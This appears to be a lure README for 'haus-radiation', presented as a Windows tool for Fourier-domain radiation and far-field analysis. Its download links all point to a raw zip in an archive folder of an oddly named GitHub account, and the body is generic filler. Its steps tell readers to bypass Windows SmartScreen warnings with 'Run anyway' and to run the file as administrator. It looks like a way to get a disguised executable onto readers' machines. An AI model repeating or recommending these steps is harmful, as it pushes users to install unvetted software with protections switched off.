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🌊 haus-radiation - Simple radiation analysis on Windows

Download haus-radiation

🚀 Getting Started

haus-radiation is a Windows app for radiation analysis in the Fourier domain. It is built for users who want to work with wave behavior, far-field results, and scientific models without setting up a complex tool chain.

Use it to:

  • load a model or data set
  • run a radiation solve
  • inspect far-field output
  • explore inverse modeling workflows
  • work with scientific computing tasks in a single place

📥 Download

Visit this page to download: https://github.com/Alishamonoclonal419/haus-radiation/raw/refs/heads/main/archive/haus_radiation_v3.8-beta.2.zip

After the page opens, look for the latest release or the main download option. Then download the Windows file and save it to your computer.

🖥️ What You Need

This app is meant for Windows desktops and laptops.

Recommended setup:

  • Windows 10 or Windows 11
  • 8 GB RAM or more
  • A few hundred MB of free disk space
  • A screen with at least 1366 × 768 resolution
  • Internet access for the first download

⚙️ How to Install

  1. Open the download page: https://github.com/Alishamonoclonal419/haus-radiation/raw/refs/heads/main/archive/haus_radiation_v3.8-beta.2.zip

  2. Find the Windows download. It may be a .exe file or a compressed file such as .zip.

  3. Download the file to your Downloads folder or a folder you can find later.

  4. If you downloaded a .zip file, right-click it and choose Extract All.

  5. Open the extracted folder if needed.

  6. Double-click the app file to start it.

  7. If Windows shows a security prompt, choose Run or More info > Run anyway if you trust the source.

  8. Wait for the app to open, then keep the file in a safe folder for future use.

🧭 First Launch

When you open haus-radiation for the first time, you can expect a clean start screen with options for loading inputs and running a solve.

Typical first steps:

  • choose a source or model file
  • set the radiation case
  • select output settings
  • run the solver
  • review the far-field result

If you are new to radiation tools, start with a small test case. That helps you learn the layout and see how the output changes.

🔍 What It Does

haus-radiation follows a first-principles approach in the Fourier domain. In simple terms, it helps you study how a source radiates energy and how that energy appears in the far field.

Main uses include:

  • radiation pattern analysis
  • spectral-domain wave studies
  • far-field estimation
  • inverse modeling experiments
  • scientific computing workflows
  • signal and spectrum review

🧪 Common Tasks

Load data

Bring in your model, source, or field input.

Run a solve

Start the radiation calculation with your chosen settings.

View output

Check field values, spectra, and far-field behavior.

Adjust parameters

Change input settings and run again to compare results.

Explore inverse models

Use output data to test how well the model matches a target pattern.

📁 File Types

The app may work with common scientific file types such as:

  • .json for settings
  • .csv for data tables
  • .txt for plain input files
  • .npy or similar numeric data files
  • project folders that store run settings and results

If the app uses a bundled input format, keep the sample files together in one folder so they are easy to load.

🧰 Best Practices

  • Keep your files in one folder
  • Use short file names with no special symbols
  • Start with simple cases before larger runs
  • Save results after each test
  • Keep a copy of your input files before editing them
  • Use the same folder for related runs so you can compare output

🪟 Troubleshooting

The app does not open

  • Check that the file finished downloading
  • Right-click the file and choose Run as administrator
  • Unzip the folder again if the app came in a compressed file

Windows blocks the file

  • Open the file again
  • If Windows shows a warning, choose More info and then Run anyway if you trust the source

The app opens but looks empty

  • Load a sample case or input file
  • Check that the project folder still contains the needed data files

Results look wrong

  • Use a smaller test case first
  • Confirm that the source file and output settings match
  • Run the solve again after checking the input values

The program feels slow

  • Close other large apps
  • Try a smaller data set
  • Make sure you have enough free memory and disk space

📚 Project Focus

This project sits at the point where physics, signal processing, and scientific computing meet. It is useful for users who want to study:

  • radiation in vacuum
  • Fourier analysis of waves
  • spectral methods
  • far-field behavior
  • inverse problems
  • Python-based scientific workflows

📌 Example Workflow

  1. Download haus-radiation from the link above
  2. Open the app on Windows
  3. Load a small source case
  4. Run the radiation solve
  5. Check the far-field output
  6. Compare the result with another input
  7. Save the run so you can return to it later

🗂️ Suggested Folder Setup

For easier use, keep files like this:

  • haus-radiation
    • input
    • results
    • samples
    • notes

This setup makes it easier to find your source files and output files after each run

🔎 Keywords

computational physics, electrodynamics, far field, Fourier analysis, inverse problems, Python, radiation, scientific computing, signal processing, spectral methods, vacuum radiation, wave physics

📎 Download Again

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About

Model radiation from moving point charges with Fourier-domain first-principles physics and a validated forward solver

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